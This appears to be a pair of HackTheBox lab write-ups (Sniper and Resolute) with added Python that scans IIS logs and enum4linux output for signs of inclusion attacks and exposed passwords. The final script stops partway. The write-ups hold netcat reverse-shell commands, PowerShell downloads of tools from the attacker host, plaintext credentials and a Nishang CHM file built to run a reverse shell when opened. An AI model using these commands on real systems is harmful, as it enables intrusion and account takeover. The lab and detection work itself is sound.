htb-sniper-nl

As always, first an nmap scan:

root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.091s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T18:02:27
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   92.15 ms 10.10.14.1
2   94.52 ms sniper.htb (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds
root@kali:~/htb/sniper#

I see that only a few ports are open, among them SMB and a web server. After some analysis of the SMB server I find nothing of immediate importance, so I keep browsing the web pages.

At some point in the blog I see a page that accepts a parameter, so I start playing with it. Because such a parameter can be vulnerable to injection, I start with local and remote file inclusion. After some ups and downs I find that neither local nor remote file inclusion works via HTTP, so I keep looking to see if anything else is possible. While researching this with Burp I come across a reference to RFI over SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1 
Host: 10.10.10.151 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1

So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples.

See also: https://www.puckiestyle.nl/create-a-public-samba-share/
On Kali, first run: systemctl start smbd


After some trial and error I see my nickname popping up in the page source, which shows that the RFI over SMB has worked. So now it is time to place a webshell on the share and call it through my SMB server.
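From the defender's side the requests above leave a clear trace in the IIS logs: a lang value that is a UNC path, a URL, a traversal sequence or an absolute local path. The following Python is an added example (not part of the original write-up) that scans constructed IIS W3C log lines for exactly those patterns; the field layout and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log excerpt (not a log from the box). cs-uri-query
# holds the raw query string as the client sent it, so values may be URL-encoded.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-01-27 18:02:10 10.10.10.151 GET /blog/ lang=en 80 10.10.14.11 200
2020-01-27 18:02:31 10.10.10.151 GET /blog/ lang=\WINDOWS\system32\drivers\etc\hosts 80 10.10.14.11 200
2020-01-27 18:03:02 10.10.10.151 GET /blog/ lang=http://10.10.14.11/shell.txt 80 10.10.14.11 200
2020-01-27 18:03:40 10.10.10.151 GET /blog/ lang=%5C%5C10.10.14.11%5Csniper%5Cshell.php 80 10.10.14.11 200
2020-01-27 18:04:05 10.10.10.151 GET /blog/ lang=..%2F..%2F..%2Fwindows%2Fwin.ini 80 10.10.14.11 200
2020-01-27 18:04:30 10.10.10.151 GET /blog/ page=about 80 10.10.14.11 200
"""

# Checked in this order: a UNC path also starts with a backslash, so it must be
# recognised before the generic absolute-path rule.
CHECKS = [
    ("unc-smb", re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]")),        # \\host\share\... or //host/share/...
    ("remote-url", re.compile(r"^(?:https?|ftp|file|php|phar|expect)://|^data:", re.I)),
    ("traversal", re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")),   # ../ or ..\ anywhere in the value
    ("local-absolute", re.compile(r"^(?:[A-Za-z]:)?[\\/]")),   # \WINDOWS\..., /etc/..., C:\...
]


def classify(value):
    """Return the inclusion category of a decoded parameter value, or None."""
    for label, pattern in CHECKS:
        if pattern.search(value):
            return label
    return None


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def scan_log(text, watched_params=("lang",)):
    """Return one finding per suspicious parameter value; watched_params=None scans every parameter."""
    findings = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qsl percent-decodes, so %5C%5C becomes \\ before classification
        for name, value in parse_qsl(query, keep_blank_values=True):
            if watched_params and name not in watched_params:
                continue
            kind = classify(value)
            if kind:
                findings.append({"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
                                 "param": name, "value": value, "kind": kind})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['kind']:15} {f['param']}={f['value']}")
```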

The db.php file contains a username and password; since these may be useful later, I note them down and decide it is time to get a proper shell.

So first I use PowerShell to transfer netcat (or, even simpler, upload the wwwolf PHP webshell):

powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe

Then I call nc.exe and get a shell on Sniper:

nc.exe 10.10.14.11 9001 -e cmd

root@kali:~/htb# rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\puckiestyle>whoami
whoami
nt authority\iusr

C:\puckiestyle>
So I have a shell as IUSR. There is only one other regular user on the box, Chris. Maybe the database password is also Chris's user password, so I want to use it from PowerShell to move to his account. After some searching on how to use a password with a PowerShell command, I came across a script and adjusted it to my needs.

root@kalivm:~/Sniper# cat getshell.ps1 
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession

Again, I use PowerShell to transfer the script and then execute it:

powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1

c:\puckiestyle>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>

So that Chris can use the files in my IUSR folder, I first open up its ACL from the IUSR shell:

c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F
cmd /c icacls puckiestyle /c /t /grant everyone:F
processed file: puckiestyle
processed file: puckiestyle\getshell.ps1
processed file: puckiestyle\Microsoft
processed file: puckiestyle\nc.exe
processed file: puckiestyle\Microsoft\Windows
processed file: puckiestyle\Microsoft\Windows\PowerShell
processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Successfully processed 7 files; Failed processing 0 files
c:\puckiestyle>powershell 
powershell 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29fc4dd867500c1ad716cf56e
PS C:\Users\Chris\Documents>

Now I have a fully functional shell.

It is also possible to use WinRM. First upload and run plink.exe, which forwards the box's WinRM port (5985) back to my Kali host:

C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
^J.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
^Jlogin as: puck
^Jpuck@10.10.14.8's password: secretpassword
^J
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151
Could not chdir to home directory /home/puck: No such file or directory
$

and next

PrivEsc

I found this:

PS C:\Users\Chris> dir Downloads
dir Downloads

Directory: C:\Users\Chris\Downloads

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A compiled HTML help file, so this could be interesting. With netcat I transferred the file to my Windows box, and this was its content.

After more enumeration on disk I found:

PS C:\Docs> type note.txt
Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it 
and after that fix the website as there are a lot of bugs on it. And I hope that you've
prepared the documentation for our new app. Drop it here when you're done with it.
Regards, Sniper CEO.
So apparently instructions.chm is the documentation Chris is supposed to prepare for the CEO and drop in this folder, so a CHM placed in C:\Docs can be expected to be opened by the CEO's account.

I first installed HTML Help Workshop (htmlhelp.exe) from https://www.microsoft.com/en-us/download/details.aspx?id=21138

and then used Nishang's Out-CHM.ps1: https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1

C:\temp>powershell -Version 2
PS C:\temp> Import-Module .\Out-CHM.ps1
PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\temp\doc.chm


Compile time: 0 minutes, 0 seconds
2 Topics
4 Local links
4 Internet links
0 Graphics


Created c:\temp\doc.chm, 13,428 bytes
Compression increased file by 271 bytes.
PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82
Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ...
10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm

From the Sniper host I use Invoke-WebRequest again to download the CHM file into C:\Docs, while a netcat listener waits for the shell. Once the CHM is opened by its intended reader, the listener receives a shell as administrator:

root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736   
Microsoft Windows [Version 10.0.17763.678]     
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15

Author : Puckiestyle

 

htb-resolute-nl

As with all Windows-based machines, I added the IP 10.10.10.169 to my /etc/hosts as resolute.htb and ran a port scan with nmap.

NMAP SCAN RESULTS

E:\PENTEST>nmap -T4 -A -v 10.10.10.169
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-10 09:15 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating Ping Scan at 09:15
Scanning 10.10.10.169 [4 ports]
Completed Ping Scan at 09:15, 2.59s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:16
Completed Parallel DNS resolution of 1 host. at 09:16, 0.00s elapsed
Initiating SYN Stealth Scan at 09:16
Scanning 10.10.10.169 [1000 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Completed SYN Stealth Scan at 09:16, 1.31s elapsed (1000 total ports)
Initiating Service scan at 09:16
Scanning 8 services on 10.10.10.169
Completed Service scan at 09:16, 17.39s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.169
Retrying OS detection (try #2) against 10.10.10.169
Retrying OS detection (try #3) against 10.10.10.169
Retrying OS detection (try #4) against 10.10.10.169
Retrying OS detection (try #5) against 10.10.10.169
Initiating Traceroute at 09:16
Completed Traceroute at 09:16, 0.15s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:16
Completed Parallel DNS resolution of 2 hosts. at 09:16, 6.51s elapsed
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:16
Completed NSE at 09:17, 26.25s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.21s elapsed
Nmap scan report for 10.10.10.169
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-10 07:29:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m20s, deviation: 4h02m31s, median: 13m19s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-07-10T00:30:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-10 09:30:10
|_ start_date: 2020-07-10 09:29:14

TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 85.00 ms 10.10.14.1
2 144.00 ms 10.10.10.169

NSE: Script Post-scanning.
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds
Raw packets sent: 1108 (52.474KB) | Rcvd: 1122 (48.618KB)

E:\PENTEST>

Next I used enum4linux:

kali@kali:~/htb/resolute$ enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 10 03:23:18 2020

==========================
| Target Information |
==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 10.10.10.169 |
====================================================
[E] Can't find workgroup/domain


============================================
| Nbtstat Information for 10.10.10.169 |
============================================
Looking up status of 10.10.10.169
No reply from 10.10.10.169

=====================================
| Session Check on 10.10.10.169 |
=====================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

===========================================
| Getting domain SID for 10.10.10.169 |
===========================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

======================================
| OS information on 10.10.10.169 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
[+] Got OS info for 10.10.10.169 from smbclient:
[+] Got OS info for 10.10.10.169 from srvinfo:
Unable to initialize messaging context
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

=========================================
| Share Enumeration on 10.10.10.169 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

====================================================
| Password Policy Information for 10.10.10.169 |
====================================================


[+] Attaching to 10.10.10.169 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] MEGABANK
[+] Builtin

[+] Password Info for Domain: MEGABANK

[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


==============================
| Groups on 10.10.10.169 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.


[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]

[+] Getting domain group memberships:
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$

=======================================================================
| Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

=============================================
| Getting printer info for 10.10.10.169 |
=============================================
Unable to initialize messaging context
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Fri Jul 10 03:25:47 2020

kali@kali:~/htb$

Now I have the list of users and their group memberships, plus a cleartext password for one user: marko's account description reads "Password set to Welcome123!".
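The two weaknesses that carry the rest of this write-up (a password stored in a user's description attribute, and a domain policy with complexity disabled and no lockout threshold) can be picked out of enum4linux output automatically. The Python below is an added example, not part of the original write-up: it parses a constructed excerpt in enum4linux's format, decodes the acb field with the MS-SAMR userAccountControl bit values, and uses a 14-character minimum length that is a threshold chosen for the example.

```python
import re

# Constructed excerpt in enum4linux's output format (the shape of the scan above,
# shortened to a handful of lines).
SAMPLE_ENUM = r"""index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
[+] Minimum password length: 7
[+] Password history length: 24
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
[+] Locked Account Duration: 30 minutes
"""

USER_RE = re.compile(
    r"^index: \S+ RID: (0x[0-9a-f]+) acb: (0x[0-9a-f]+) Account: (\S+) Name: (.*?) Desc: (.*)$"
)
POLICY_RE = re.compile(r"^\[\+\] ([A-Za-z ]+): (.+)$")
# "Password set to X", "password: X", "pwd=X" ... inside a description field
SECRET_RE = re.compile(r"\b(?:pass(?:word|wd)?|pwd)\b\s*(?:is|set to|[:=])?\s*(\S{6,})", re.I)

# userAccountControl bits (MS-SAMR) as enum4linux prints them in the acb field
ACB_DISABLED = 0x0001
ACB_PWNOTREQ = 0x0004
ACB_PWNOEXP = 0x0200

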